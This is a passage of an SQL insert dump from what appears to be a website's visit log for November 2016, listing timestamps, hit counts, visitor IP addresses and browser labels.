9,1479260001,1,0,1,0,'66.249.66.87',''),(75130,1479260282,1,1,0,0,'163.172.65.125','other'),(75131,1479260767,1,1,0,0,'163.172.65.17','other'),(75132,1479260801,1,1,0,0,'163.172.64.223','other'),(75133,1479261669,1,1,0,0,'163.172.65.29','other'),(75134,1479262218,1,1,0,0,'157.55.39.96','other'),(75135,1479262348,1,1,0,0,'163.172.65.19','other'),(75136,1479262431,1,0,1,0,'66.249.66.87',''),(75137,1479262953,1,1,0,0,'163.172.65.36','other'),(75138,1479263176,1,1,0,0,'141.8.183.25','other'),(75139,1479263394,1,1,0,0,'163.172.66.180','other'),(75140,1479263724,1,0,1,0,'66.249.66.81',''),(75141,1479265016,1,1,0,0,'163.172.65.55','other'),(75142,1479265130,1,1,0,0,'163.172.66.24','other'),(75143,1479265178,1,0,1,0,'66.249.66.183',''),(75144,1479265500,1,0,1,0,'66.249.66.81',''),(75145,1479265589,1,1,0,0,'163.172.66.180','other'),(75146,1479265635,2,2,0,0,'130.193.50.34','other'),(75147,1479266212,2,0,2,0,'66.249.66.87',''),(75148,1479266878,1,0,1,0,'66.249.66.81',''),(75149,1479267008,1,1,0,0,'130.193.50.34','other'),(75150,1479269658,1,1,0,0,'163.172.65.145','other'),(75151,1479270574,1,1,0,0,'163.172.66.141','other'),(75152,1479270884,1,1,0,0,'163.172.66.60','other'),(75153,1479271244,1,1,0,0,'163.172.66.124','other'),(75154,1479271258,1,1,0,0,'130.193.50.34','other'),(75155,1479271380,2,0,2,0,'66.249.66.84',''),(75156,1479271458,1,0,1,0,'66.249.66.87',''),(75157,1479271501,1,1,0,0,'217.69.133.226','other'),(75158,1479271506,1,1,0,0,'163.172.65.215','other'),(75159,1479271541,1,1,0,0,'163.172.66.141','other'),(75160,1479271543,1,1,0,0,'163.172.65.216','other'),(75161,1479272052,1,1,0,0,'163.172.65.108','other'),(75162,1479272375,1,0,1,0,'66.249.66.87',''),(75163,1479272798,1,1,0,0,'163.172.66.107','other'),(75164,1479273480,1,1,0,0,'163.172.66.53','other'),(75165,1479273687,1,1,0,0,'163.172.66.47','other'),(75166,1479273897,1,1,0,0,'163.172.66.170','other'),(75167,1479274181,1,1,0,0,'163.172.66.172','other'),(75168,1479274415,1,1,0,0,'163.172.66.132','other'),(75169,1479275651,2,0,2,0,'66.249.66.84',''),(75170,1479275912,1,0,1,0,'66.249.66.81',''),(75171,1479276163,2,0,2,0,'66.249.66.87',''),(75172,1479276370,1,1,0,0,'163.172.66.16','other'),(75173,1479276788,1,1,0,0,'163.172.65.242','other'),(75174,1479276795,1,1,0,0,'207.46.13.108','other'),(75175,1479277632,1,1,0,0,'163.172.64.217','other'),(75176,1479277721,3,0,3,0,'66.249.66.84',''),(75177,1479277743,1,1,0,0,'163.172.65.210','other'),(75178,1479278112,1,1,0,0,'163.172.65.6','other'),(75179,1479278221,1,0,1,0,'66.249.66.87',''),(75180,1479278341,1,1,0,0,'91.196.178.66','firefox'),(75181,1479278364,2,2,0,0,'141.8.183.25','other'),(75182,1479278505,1,1,0,0,'163.172.65.222','other'),(75183,1479278749,1,1,0,0,'91.196.178.37','chrome'),(75184,1479278771,1,1,0,0,'163.172.65.228','other'),(75185,1479278830,1,1,0,0,'163.172.65.10','other'),(75186,1479278857,1,1,0,0,'91.196.178.132','chrome'),(75187,1479278872,1,1,0,0,'163.172.65.66','other'),(75188,1479278970,1,1,0,0,'91.196.178.34','chrome'),(75189,1479278993,1,1,0,0,'163.172.66.149','other'),(75190,1479279096,1,1,0,0,'163.172.64.181','other'),(75191,1479279438,1,1,0,0,'163.172.66.49','other'),(75192,1479279485,1,1,0,0,'163.172.66.90','other'),(75193,1479279536,1,1,0,0,'91.196.177.46','firefox'),(75194,1479279765,1,1,0,0,'163.172.66.95','other'),(75195,1479279919,1,1,0,0,'66.249.93.143','chrome'),(75196,1479280297,1,0,1,0,'66.249.66.87',''),(75197,1479280374,1,1,0,0,'94.179.24.4','firefox'),(75198,1479280428,1,0,1,0,'66.249.66.81',''),(75199,1479280487,1,1,0,0,'163.172.66.123','other'),(75200,1479280929,1,1,0,0,'178.255.215.94','other'),(75201,1479281338,1,1,0,0,'180.76.15.18','other'),(75202,1479281666,1,1,0,0,'130.180.219.180','firefox'),(75203,1479282051,1,1,0,0,'163.172.66.51','other'),(75204,1479282504,1,1,0,0,'180.76.15.14','other'),(75205,1479282646,1,1,0,0,'163.172.66.66','other'),(75206,1479282738,1,0,1,0,'66.249.66.81',''),(75207,1479282931,1,1,0,0,'163.172.66.78','other'),(75208,1479282967,1,0,1,0,'66.249.66.84',''),(75209,1479282968,1,1,0,0,'91.196.178.66','chrome'),(75210,1479283021,3,0,3,0,'66.249.66.87',''),(75211,1479283330,1,1,0,0,'163.172.65.251','other'),(75212,1479283596,1,1,0,0,'163.172.64.243','other'),(75213,1479283600,1,1,0,0,'91.196.177.15','chrome'),(75214,1479284013,1,1,0,0,'163.172.66.167','other'),(75215,1479284197,1,1,0,0,'163.172.66.88','other'),(75216,1479284525,1,1,0,0,'163.172.64.178','other'),(75217,1479284921,1,1,0,0,'163.172.66.150','other'),(75218,1479285420,1,1,0,0,'163.172.65.229','other'),(75219,1479285508,1,1,0,0,'163.172.66.169','other'),(75220,1479285883,1,1,0,0,'82.207.91.234','firefox'),(75221,1479286213,1,1,0,0,'95.158.32.105','chrome'),(75222,1479286512,1,1,0,0,'37.53.224.24','firefox'),(75223,1479286615,1,1,0,0,'176.38.47.48','firefox'),(75225,1479286706,1,1,0,0,'163.172.65.231','other'),(75226,1479286747,3,0,3,0,'66.249.66.84',''),(75227,1479286830,1,0,1,0,'66.249.66.87',''),(75228,1479286883,1,0,1,0,'66.249.66.81',''),(75229,1479287114,1,1,0,0,'92.113.131.223','chrome'),(75230,1479287202,1,1,0,0,'77.93.41.218','chrome'),(75231,1479287316,1,1,0,0,'66.102.9.27','chrome'),(75232,1479287936,1,1,0,0,'176.38.47.48','firefox'),(75233,1479287939,1,1,0,0,'91.196.178.70','chrome'),(75234,1479287980,1,1,0,0,'163.172.66.122','other'),(75235,1479288009,1,1,0,0,'163.172.65.118','other'),(75236,1479288104,1,1,0,0,'37.53.224.24','firefox'),(75237,1479288836,1,1,0,0,'163.172.64.236','other'),(75238,1479288847,2,0,2,0,'66.249.66.81',''),(75239,1479289505,1,1,0,0,'163.172.65.243','other'),(75240,1479289835,1,0,1,0,'66.249.66.87',''),(75241,1479290341,1,1,0,0,'163.172.66.43','other'),(75242,1479291528,1,0,1,0,'66.249.66.84',''),(75243,1479291771,1,1,0,0,'163.172.65.11','other'),(75244,1479291796,1,1,0,0,'163.172.66.142','other'),(75245,1479291811,1,1,0,0,'46.201.18.55','chrome'),(75246,1479292497,1,1,0,0,'163.172.66.19','other'),(75247,1479292908,1,0,1,0,'66.249.66.81',''),(75248,1479293045,1,1,0,0,'163.172.66.157','other'),(75249,1479293699,1,1,0,0,'37.54.23.227','chrome'),(75250,1479293777,1,1,0,0,'163.172.65.145','other'),(75251,1479293980,1,0,1,0,'66.249.66.81',''),(75252,1479294519,1,1,0,0,'163.172.66.87','other'),(75253,1479294523,1,0,1,0,'66.249.66.84',''),(75254,1479295089,1,1,0,0,'66.249.66.87','chrome'),(75255,1479295224,1,1,0,0,'66.249.66.183','chrome'),(75256,1479295517,1,1,0,0,'163.172.64.250','other'),(75257,1479295518,1,1,0,0,'207.46.13.108','other'),(75258,1479295671,1,1,0,0,'130.193.50.34','other'),(75259,1479295719,1,1,0,0,'163.172.65.29','other'),(75260,1479297068,1,0,1,0,'66.249.66.84',''),(75261,1479297621,1,1,0,0,'130.193.50.34','other'),(75262,1479297689,1,1,0,0,'163.172.64.244','other'),(75263,1479298941,1,0,1,0,'66.249.66.84',''),(75264,1479299067,1,1,0,0,'163.172.66.174','other'),(75265,1479299118,1,1,0,0,'194.37.248.11','msie'),(75266,1479299134,1,1,0,0,'130.193.50.34','other'),(75267,1479299137,1,1,0,0,'91.196.178.70','firefox'),(75268,1479299318,1,1,0,0,'141.8.183.25','other'),(75269,1479299903,1,1,0,0,'163.172.65.121','other'),(75270,1479300254,1,1,0,0,'163.172.65.240','other'),(75271,1479300350,1,0,1,0,'66.249.66.81',''),(75272,1479301115,1,1,0,0,'157.55.39.96','other'),(75273,1479301130,1,1,0,0,'157.55.39.19','other'),(75274,1479301147,1,0,1,0,'66.249.66.84',''),(75275,1479301293,1,1,0,0,'163.172.65.40','other'),(75276,1479302454,1,1,0,0,'82.207.32.158','chrome'),(75277,1479303174,1,1,0,0,'163.172.66.159','other'),(75278,1479303235,1,1,0,0,'163.172.66.78','other'),(75279,1479303444,1,1,0,0,'163.172.64.251','other'),(75280,1479303657,1,1,0,0,'66.102.9.29','other'),(75281,1479304343,1,1,0,0,'91.196.178.161','chrome'),(75282,1479304423,1,1,0,0,'163.172.66.75','other'),(75283,1479304740,1,1,0,0,'163.172.66.149','other'),(75284,1479305480,1,1,0,0,'163.172.65.57','other'),(75285,1479306557,1,1,0,0,'163.172.66.64','other'),(75286,1479307143,1,1,0,0,'94.179.116.10','chrome'),(75287,1479307370,1,1,0,0,'163.172.65.68','other'),(75288,1479307409,1,1,0,0,'157.55.39.19','other'),(75289,1479307497,1,0,1,0,'66.249.66.81',''),(75290,1479307840,1,1,0,0,'82.145.223.56','opera'),(75291,1479307932,1,1,0,0,'163.172.64.177','other'),(75292,1479308343,1,0,1,0,'66.249.66.177',''),(75293,1479308390,1,1,0,0,'163.172.66.129','other'),(75294,1479308639,1,0,1,0,'66.249.66.81',''),(75295,1479310039,1,1,0,0,'91.196.177.46','chrome'),(75296,1479311118,1,1,0,0,'91.196.178.161','chrome'),(75297,1479311901,1,1,0,0,'157.55.39.96','other'),(75298,1479312102,1,1,0,0,'94.179.26.156','opera'),(75299,1479312361,3,0,3,0,'66.249.66.81',''),(75300,1479312848,1,1,0,0,'163.172.64.178','other'),(75301,1479313043,1,0,1,0,'66.249.66.84',''),(75302,1479313961,1,0,1,0,'66.249.66.84',''),(75303,1479315306,1,1,0,0,'163.172.64.241','other'),(75304,1479315522,1,0,1,0,'66.249.66.87',''),(75305,1479318094,1,1,0,0,'66.102.9.27','other'),(75306,1479318202,1,1,0,0,'157.55.39.19','other'),(75307,1479318833,1,1,0,0,'37.115.84.22','chrome'),(75308,1479319489,1,0,1,0,'66.249.66.84',''),(75309,1479320535,1,0,1,0,'66.249.66.87',''),(75310,1479322466,1,0,1,0,'66.249.66.87',''),(75311,1479322539,1,1,0,0,'91.196.178.72','firefox'),(75312,1479323666,1,1,0,0,'91.196.178.67','firefox'),(75313,1479324522,1,0,1,0,'66.249.66.87',''),(75314,1479324536,1,0,1,0,'66.249.66.81',''),(75315,1479324698,2,0,2,0,'66.249.66.84',''),(75316,1479325213,1,1,0,0,'180.76.15.134','other'),(75317,1479326140,1,0,1,0,'66.249.66.81',''),(75318,1479326445,1,0,1,0,'66.249.66.202',''),(75319,1479326522,1,0,1,0,'66.249.66.84',''),(75320,1479326563,1,1,0,0,'46.211.67.202','chrome'),(75321,1479327861,2,0,2,0,'66.249.66.87',''),(75322,1479328099,1,0,1,0,'66.249.66.81',''),(75323,1479328317,1,1,0,0,'93.183.222.147','chrome'),(75324,1479329517,1,1,0,0,'163.172.64.236','other'),(75325,1479329846,1,0,1,0,'66.249.66.87',''),(75326,1479330368,1,1,0,0,'163.172.64.235','other'),(75327,1479331134,1,0,1,0,'66.249.66.84',''),(75328,1479331860,1,0,1,0,'66.249.66.87',''),(75329,1479332719,1,1,0,0,'66.102.9.25','other'),(75330,1479333196,2,0,2,0,'66.249.66.81',''),(75331,1479333805,1,0,1,0,'66.249.66.84',''),(75332,1479334751,1,1,0,0,'163.172.64.228','other'),(75333,1479336178,1,0,1,0,'66.249.66.81',''),(75334,1479336504,1,0,1,0,'66.249.66.210',''),(75335,1479337370,1,0,1,0,'66.249.66.87',''),(75336,1479337493,1,0,1,0,'66.249.66.210',''),(75337,1479338533,1,0,1,0,'66.249.66.84',''),(75338,1479338545,1,0,1,0,'66.249.66.202',''),(75339,1479338590,1,0,1,0,'66.249.66.81',''),(75340,1479341114,1,0,1,0,'66.249.66.84',''),(75341,1479341324,1,0,1,0,'66.249.66.197',''),(75342,1479341417,1,1,0,0,'163.172.64.222','other'),(75343,1479341596,1,0,1,0,'66.249.66.81',''),(75344,1479343229,1,0,1,0,'66.249.66.87',''),(75345,1479343849,1,1,0,0,'207.46.13.108','other'),(75346,1479344289,1,0,1,0,'66.249.66.81',''),(75347,1479345333,2,0,2,0,'66.249.66.87',''),(75348,1479346403,1,1,0,0,'180.76.15.5','other'),(75349,1479346943,1,1,0,0,'66.102.9.25','other'),(75350,1479346959,3,0,3,0,'66.249.66.81',''),(75351,1479348813,1,1,0,0,'163.172.64.254','other'),(75352,1479349349,1,0,1,0,'66.249.66.81',''),(75353,1479349487,2,0,2,0,'66.249.66.84',''),(75354,1479350074,1,0,1,0,'68.180.229.190',''),(75355,1479351018,1,0,1,0,'66.249.66.84',''),(75356,1479351603,1,1,0,0,'163.172.64.231','other'),(75357,1479353045,1,0,1,0,'68.180.229.190',''),(75358,1479353180,1,1,0,0,'163.172.64.189','other'),(75359,1479353825,2,0,2,0,'66.249.66.81',''),(75360,1479354378,2,0,2,0,'66.249.66.84',''),(75361,1479355031,1,1,0,0,'66.249.66.202','chrome'),(75362,1479355413,1,1,0,0,'207.46.13.108','other'),(75363,1479358029,1,0,1,0,'66.249.66.81',''),(75364,1479358677,2,0,2,0,'66.249.66.87',''),(75365,1479359075,1,0,1,0,'66.249.66.202',''),(75366,1479359164,1,1,0,0,'40.77.167.8','other'),(75367,1479359252,1,0,1,0,'66.249.66.84',''),(75368,1479359928,1,1,0,0,'163.172.64.187','other'),(75369,1479361059,1,1,0,0,'77.93.41.218','chrome'),(75370,1479361366,1,1,0,0,'66.102.9.27','other'),(75371,1479361552,1,0,1,0,'66.249.66.81',''),(75372,1479362623,1,1,0,0,'37.73.241.183','chrome'),(75373,1479363005,1,1,0,0,'94.179.12.20','chrome'),(75374,1479363744,1,1,0,0,'163.172.64.248','other'),(75375,1479364955,1,1,0,0,'66.102.9.29','chrome'),(75376,1479366277,1,0,1,0,'66.249.66.84',''),(75377,1479366361,2,0,2,0,'66.249.66.81',''),(75378,1479367019,1,1,0,0,'163.172.64.189','other'),(75379,1479367753,1,1,0,0,'163.172.64.233','other'),(75380,1479368070,1,1,0,0,'163.172.64.178','other'),(75381,1479368237,1,1,0,0,'95.135.215.241','chrome'),(75382,1479368492,1,1,0,0,'91.196.178.169','chrome'),(75383,1479368516,1,1,0,0,'157.55.39.96','other'),(75384,1479368546,1,1,0,0,'130.193.50.34','other'),(75385,1479368878,1,1,0,0,'37.55.108.70','chrome'),(75386,1479369724,3,0,3,0,'66.249.66.84',''),(75387,1479370534,1,1,0,0,'91.196.178.65','chrome'),(75388,1479370563,1,1,0,0,'163.172.64.192','other'),(75389,1479371898,1,1,0,0,'46.211.2.77','chrome'),(75390,1479372139,2,2,0,0,'174.129.237.157','other'),(75391,1479372827,1,1,0,0,'91.196.177.15','firefox'),(75392,1479373668,2,0,2,0,'66.249.66.81',''),(75393,1479373698,2,2,0,0,'174.129.237.157','other'),(75394,1479373841,2,0,2,0,'66.249.66.87',''),(75395,1479373866,1,1,0,0,'207.46.13.108','other'),(75396,1479374593,1,1,0,0,'91.196.178.68','chrome'),(75397,1479375207,1,1,0,0,'157.55.39.96','other'),(75398,1479375710,1,1,0,0,'66.102.9.29','other'),(75399,1479376379,1,0,1,0,'66.249.66.84',''),(75400,1479376386,2,2,0,0,'193.161.13.33','chrome'),(75401,1479376777,1,1,0,0,'91.217.61.15','chrome'),(75402,1479376790,1,1,0,0,'130.193.50.34','other'),(75403,1479377226,1,1,0,0,'188.163.77.16','chrome'),(75404,1479378158,1,1,0,0,'91.196.177.15','firefox'),(75405,1479378367,1,1,0,0,'174.129.237.157','other'),(75406,1479378598,1,1,0,0,'207.46.13.108','other'),(75407,1479378893,1,1,0,0,'91.124.111.181','chrome'),(75408,1479379222,1,1,0,0,'163.172.64.241','other'),(75409,1479379953,1,0,1,0,'66.249.66.202',''),(75410,1479380170,1,0,1,0,'66.249.66.84',''),(75411,1479380282,1,0,1,0,'66.249.66.81',''),(75412,1479380348,1,1,0,0,'91.196.178.67','firefox'),(75413,1479381662,1,0,1,0,'66.249.66.84',''),(75414,1479381667,1,1,0,0,'174.129.237.157','other'),(75415,1479382912,1,0,1,0,'66.249.66.81',''),(75416,1479382948,1,0,1,0,'66.249.66.84',''),(75417,1479383050,1,0,1,0,'66.249.66.87',''),(75418,1479383207,1,1,0,0,'46.98.82.58','chrome'),(75419,1479384012,1,1,0,0,'91.196.178.72','chrome'),(75420,1479384230,1,1,0,0,'91.196.178.164','chrome'),(75421,1479384567,1,1,0,0,'193.161.13.33','chrome'),(75422,1479384740,1,1,0,0,'163.172.64.235','other'),(75423,1479385138,1,1,0,0,'188.255.51.6','msie'),(75424,1479385293,1,1,0,0,'163.172.64.244','other'),(75425,1479385731,1,1,0,0,'192.99.9.164','chrome'),(75426,1479386312,1,0,1,0,'66.249.66.87',''),(75427,1479386474,1,1,0,0,'94.179.209.79','firefox'),(75428,1479387566,1,1,0,0,'176.195.119.4','msie'),(75429,1479388678,1,1,0,0,'5.9.98.178','other'),(75430,1479389579,1,1,0,0,'5.9.98.178','other'),(75431,1479390115,1,1,0,0,'66.102.9.29','other'),(75432,1479390480,1,1,0,0,'5.9.98.178','other'),(75433,1479390617,1,1,0,0,'130.180.219.221','chrome'),(75434,1479390642,1,1,0,0,'141.8.183.25','other'),(75435,1479391699,1,1,0,0,'212.90.183.78','firefox'),(75436,1479392255,1,1,0,0,'157.55.39.19','other'),(75437,1479392535,1,1,0,0,'94.179.227.51','chrome'),(75438,1479392900,1,1,0,0,'91.196.178.66','firefox'),(75439,1479393387,1,1,0,0,'91.196.178.164','chrome'),(75440,1479394035,1,1,0,0,'212.90.183.78','firefox'),(75441,1479394100,1,1,0,0,'66.249.66.87','chrome'),(75442,1479395102,1,1,0,0,'46.174.125.28','chrome'),(75443,1479395439,1,1,0,0,'62.80.166.58','chrome'),(75444,1479395765,1,1,0,0,'178.94.172.139','chrome'),(75445,1479396168,1,1,0,0,'95.135.241.128','firefox'),(75446,1479396208,1,0,1,0,'66.249.66.84',''),(75447,1479397140,1,1,0,0,'212.90.183.78','firefox'),(75448,1479397387,1,1,0,0,'163.172.64.199','other'),(75449,1479397471,1,1,0,0,'37.52.40.153','chrome'),(75450,1479397552,1,1,0,0,'78.111.185.215','firefox'),(75451,1479397901,1,0,1,0,'66.249.66.87',''),(75452,1479397965,1,1,0,0,'163.172.64.180','other'),(75453,1479398034,1,1,0,0,'46.211.5.197','chrome'),(75454,1479398207,1,0,1,0,'66.249.66.202',''),(75455,1479398429,1,1,0,0,'40.77.167.8','other'),(75456,1479398513,1,0,1,0,'66.249.66.81',''),(75457,1479399356,1,1,0,0,'91.196.178.37','chrome'),(75458,1479400323,5,5,0,0,'95.85.61.155','other'),(75459,1479400355,1,1,0,0,'91.196.177.35','firefox'),(75460,1479400372,2,2,0,0,'130.193.50.34','other'),(75461,1479401201,1,1,0,0,'163.172.64.246','other'),(75462,1479401468,1,1,0,0,'91.196.177.35','firefox'),(75463,1479402449,1,1,0,0,'91.196.177.35','firefox'),(75464,1479403153,1,1,0,0,'40.77.167.8','other'),(75465,1479403362,1,1,0,0,'91.124.194.255','chrome'),(75466,1479404527,1,1,0,0,'66.102.9.29','other'),(75467,1479404724,1,1,0,0,'163.172.64.224','other'),(75468,1479407044,1,1,0,0,'163.172.64.188','other'),(75469,1479407134,1,0,1,0,'66.249.66.84',''),(75470,1479408759,1,1,0,0,'141.8.142.61','other'),(75471,1479409418,1,1,0,0,'163.172.64.241','other'),(75472,1479409668,1,1,0,0,'66.102.9.27','chrome'),(75473,1479409892,1,1,0,0,'180.76.15.24','other'),(75474,1479409953,1,1,0,0,'157.55.39.19','other'),(75475,1479411787,1,1,0,0,'37.54.19.77','chrome'),(75476,1479412774,1,0,1,0,'66.249.66.81',''),(75477,1479413088,1,1,0,0,'157.55.39.19','other'),(75478,1479415080,1,0,1,0,'66.249.66.84',''),(75479,1479417015,1,1,0,0,'163.172.64.188','other'),(75480,1479419076,1,1,0,0,'66.102.9.25','other'),(75481,1479421427,4,0,4,0,'66.249.66.81',''),(75482,1479421564,2,0,2,0,'66.249.66.84',''),(75483,1479421904,2,0,2,0,'66.249.66.87',''),(75484,1479422741,1,0,1,0,'66.249.66.84',''),(75485,1479422882,1,0,1,0,'66.249.66.87',''),(75486,1479423419,1,1,0,0,'180.76.15.161','other'),(75487,1479424417,1,0,1,0,'66.249.66.81',''),(75488,1479427835,1,1,0,0,'207.46.13.108','other'),(75489,1479428584,1,1,0,0,'163.172.64.177','other'),(75490,1479429740,1,1,0,0,'163.172.64.236','other'),(75491,1479430623,1,1,0,0,'163.172.64.192','other'),(75492,1479431878,1,0,1,0,'66.249.66.84',''),(75493,1479431929,2,0,2,0,'66.249.66.81',''),(75494,1479432228,1,0,1,0,'66.249.66.202',''),(75495,1479433532,1,1,0,0,'66.102.9.29','other'),(75496,1479433648,1,0,1,0,'68.180.230.220',''),(75497,1479434281,1,0,1,0,'66.249.66.81',''),(75498,1479435929,1,1,0,0,'163.172.64.222','other'),(75499,1479436291,2,1,1,0,'66.249.66.84',''),(75500,1479436699,1,1,0,0,'163.172.64.246','other'),(75501,1479436806,1,1,0,0,'66.249.66.87','chrome'),(75502,1479437519,1,1,0,0,'157.55.39.96','other'),(75503,1479438406,1,1,0,0,'66.249.66.87','chrome'),(75504,1479439848,1,1,0,0,'157.55.39.96','other'),(75505,1479439954,1,0,1,0,'66.249.66.87',''),(75506,1479441269,1,1,0,0,'163.172.64.236','other'),(75507,1479443503,1,0,1,0,'66.249.66.84',''),(75508,1479443564,1,1,0,0,'180.76.15.135','other'),(75509,1479444626,1,0,1,0,'68.180.230.220',''),(75510,1479445487,1,0,1,0,'66.249.66.87',''),(75511,1479447869,1,1,0,0,'66.102.9.25','other'),(75512,1479449054,1,0,1,0,'66.249.76.14',''),(75513,1479449202,1,1,0,0,'212.113.42.138','chrome'),(75514,1479449863,1,1,0,0,'163.172.64.251','other'),(75515,1479449918,1,0,1,0,'66.249.76.15',''),(75516,1479450493,1,1,0,0,'94.179.7.192','firefox'),(75517,1479450593,1,1,0,0,'91.196.178.67','chrome'),(75518,1479450929,1,1,0,0,'207.46.13.108','other'),(75519,1479450956,1,1,0,0,'66.249.76.14','chrome'),(75520,1479451011,1,1,0,0,'66.249.76.108','chrome'),(75521,1479451324,1,1,0,0,'157.55.39.96','other'),(75522,1479455630,1,1,0,0,'40.77.167.11','other'),(75523,1479455652,1,1,0,0,'178.210.147.199','chrome'),(75524,1479456183,1,1,0,0,'91.196.178.169','chrome'),(75525,1479456779,1,1,0,0,'46.200.108.182','msie'),(75526,1479456820,1,1,0,0,'141.8.183.25','other'),(75527,1479457092,1,1,0,0,'46.98.102.175','chrome'),(75528,1479457568,1,1,0,0,'95.134.23.74','chrome'),(75529,1479458101,1,1,0,0,'163.172.64.230','other'),(75530,1479459706,1,1,0,0,'91.196.178.66','chrome'),(75531,1479459996,1,1,0,0,'163.172.64.244','other'),(75532,1479460111,1,1,0,0,'94.179.118.81','chrome'),(75533,1479460399,1,0,1,0,'66.249.76.14',''),(75534,1479461223,1,1,0,0,'163.172.64.186','other'),(75535,1479461245,2,2,0,0,'130.193.50.34','other'),(75536,1479461456,1,1,0,0,'66.249.76.15','chrome'),(75537,1479461824,1,1,0,0,'157.55.39.96','other'),(75538,1479462151,1,1,0,0,'66.102.9.27','other'),(75539,1479462857,1,1,0,0,'163.172.64.236','other'),(75540,1479464013,1,1,0,0,'212.113.42.90','chrome'),(75541,1479464666,1,1,0,0,'163.172.64.230','other'),(75542,1479466205,1,1,0,0,'141.8.142.58','other'),(75543,1479466320,1,1,0,0,'180.76.15.23','other'),(75544,1479467345,1,0,1,0,'66.249.76.13',''),(75545,1479468008,1,1,0,0,'91.196.178.65','firefox'),(75546,1479468315,2,2,0,0,'174.129.237.157','other'),(75547,1479469803,1,1,0,0,'91.196.178.161','chrome'),(75548,1479469934,1,0,1,0,'66.249.66.202',''),(75549,1479470434,1,1,0,0,'163.172.64.188','other'),(75550,1479471316,1,1,0,0,'91.196.178.34','firefox'),(75551,1479471599,1,1,0,0,'157.55.39.96','other'),(75552,1479471705,4,4,0,0,'141.8.183.25','other'),(75553,1479471708,1,1,0,0,'141.8.142.67','other'),(75554,1479471739,1,1,0,0,'130.193.51.19','other'),(75555,1479471751,1,1,0,0,'141.8.142.58','other'),(75556,1479472782,1,1,0,0,'141.8.142.58','other'),(75557,1479474196,1,1,0,0,'163.172.64.192','other'),(75558,1479474430,1,1,0,0,'176.118.54.187','other'),(75559,1479474459,1,1,0,0,'95.135.179.37','chrome'),(75560,1479474679,1,1,0,0,'130.193.51.19','other'),(75561,1479475791,1,1,0,0,'163.172.64.241','other'),(75562,1479476410,1,1,0,0,'91.196.178.161','chrome'),(75563,1479476581,1,1,0,0,'141.8.142.58','other'),(75564,1479476601,1,1,0,0,'66.102.9.27','other'),(75565,1479478336,1,1,0,0,'37.55.151.205','firefox'),(75566,1479478485,1,1,0,0,'130.193.51.74','other'),(75567,1479480080,1,1,0,0,'163.172.64.180','other'),(75568,1479480184,1,1,0,0,'157.55.39.60','other'),(75569,1479480392,1,1,0,0,'130.193.50.34','other'),(75570,1479481720,1,1,0,0,'94.179.209.79','firefox'),(75571,1479481741,1,1,0,0,'66.102.9.29','chrome'),(75572,1479481821,1,1,0,0,'141.8.142.61','other'),(75573,1479481836,1,1,0,0,'91.196.178.72','chrome'),(75574,1479481860,1,0,1,0,'66.249.76.13',''),(75575,1479482358,1,1,0,0,'195.200.91.186','chrome'),(75576,1479485827,1,1,0,0,'141.8.184.22','other'),(75577,1479486125,1,1,0,0,'163.172.64.199','other'),(75578,1479486820,1,1,0,0,'157.55.39.96','other'),(75579,1479486828,1,1,0,0,'5.255.253.47','other'),(75580,1479486832,1,1,0,0,'141.8.183.25','other'),(75581,1479487407,1,1,0,0,'163.172.64.178','other'),(75582,1479487853,1,1,0,0,'141.8.142.155','other'),(75583,1479487877,1,1,0,0,'207.46.13.108','other'),(75584,1479488014,1,0,1,0,'66.249.66.202',''),(75585,1479488666,1,1,0,0,'180.76.15.11','other'),(75586,1479489366,1,1,0,0,'163.172.64.243','other'),(75587,1479489554,1,1,0,0,'180.76.15.146','other'),(75588,1479491070,1,1,0,0,'66.102.9.29','other'),(75589,1479492343,1,1,0,0,'130.193.50.34','other'),(75590,1479492930,1,1,0,0,'91.196.178.68','firefox'),(75591,1479493271,1,1,0,0,'163.172.64.222','other'),(75592,1479494183,1,1,0,0,'172.98.200.218','chrome'),(75593,1479495632,1,1,0,0,'130.193.50.34','other'),(75594,1479496109,1,1,0,0,'66.102.9.27','other'),(75595,1479497155,1,1,0,0,'157.55.39.60','other'),(75596,1479497815,1,1,0,0,'163.172.64.192','other'),(75597,1479502713,1,1,0,0,'207.46.13.108','other'),(75598,1479503420,1,1,0,0,'185.26.180.166','chrome'),(75599,1479504484,1,1,0,0,'207.46.13.108','other'),(75600,1479505547,1,1,0,0,'66.102.9.29','other'),(75601,1479506280,1,1,0,0,'54.152.102.80','other'),(75602,1479506302,1,1,0,0,'141.8.142.58','other'),(75603,1479506541,4,0,4,0,'66.249.76.13',''),(75604,1479507181,1,0,1,0,'66.249.66.81',''),(75605,1479508400,1,1,0,0,'141.8.142.58','other'),(75606,1479509166,1,1,0,0,'141.8.142.67','other'),(75607,1479509643,1,1,0,0,'157.55.39.96','other'),(75608,1479510784,2,0,2,0,'66.249.76.13',''),(75609,1479510817,1,0,1,0,'66.249.66.81',''),(75610,1479510826,1,1,0,0,'130.193.50.34','other'),(75611,1479511344,1,1,0,0,'207.46.13.108','other'),(75612,1479511787,1,0,1,0,'68.180.230.220',''),(75613,1479514726,1,1,0,0,'198.50.131.46','other'),(75614,1479515334,1,0,1,0,'66.249.76.14',''),(75615,1479515715,1,0,1,0,'66.249.76.13',''),(75616,1479515980,1,1,0,0,'207.46.13.108','other'),(75617,1479519925,1,1,0,0,'66.102.9.29','other'),(75618,1479521563,1,0,1,0,'66.249.76.15',''),(75619,1479525038,1,0,1,0,'66.249.76.13',''),(75620,1479526630,1,1,0,0,'95.221.242.41','other'),(75621,1479526631,1,1,0,0,'31.173.85.1','other'),(75623,1479526636,1,1,0,0,'94.180.154.231','chrome'),(75624,1479526650,1,1,0,0,'31.173.81.183','other'),(75625,1479527012,1,0,1,0,'66.249.76.14',''),(75626,1479527970,1,1,0,0,'130.193.50.6','other'),(75627,1479531858,1,1,0,0,'207.46.13.92','other'),(75628,1479534213,1,1,0,0,'66.102.9.29','other'),(75629,1479534635,1,1,0,0,'207.46.13.92','other'),(75630,1479535080,1,1,0,0,'180.76.15.139','other'),(75631,1479535182,1,1,0,0,'130.180.218.96','chrome'),(75632,1479536153,1,0,1,0,'66.249.76.28',''),(75633,1479536859,1,1,0,0,'157.55.39.24','other'),(75634,1479537394,2,2,0,0,'95.213.141.126','opera'),(75635,1479537782,1,0,1,0,'68.180.230.220',''),(75636,1479541022,1,1,0,0,'163.172.64.246','other'),(75637,1479543918,1,1,0,0,'66.249.76.155','chrome'),(75638,1479543927,1,1,0,0,'66.249.76.131','chrome'),(75639,1479544283,6,6,0,0,'200.98.112.157','other'),(75640,1479544943,1,1,0,0,'157.55.39.24','other'),(75641,1479545117,2,1,1,0,'62.210.83.88',''),(75642,1479545246,1,1,0,0,'92.112.249.198','chrome'),(75643,1479546333,1,1,0,0,'130.193.51.19','other'),(75644,1479547097,1,1,0,0,'91.196.178.132','chrome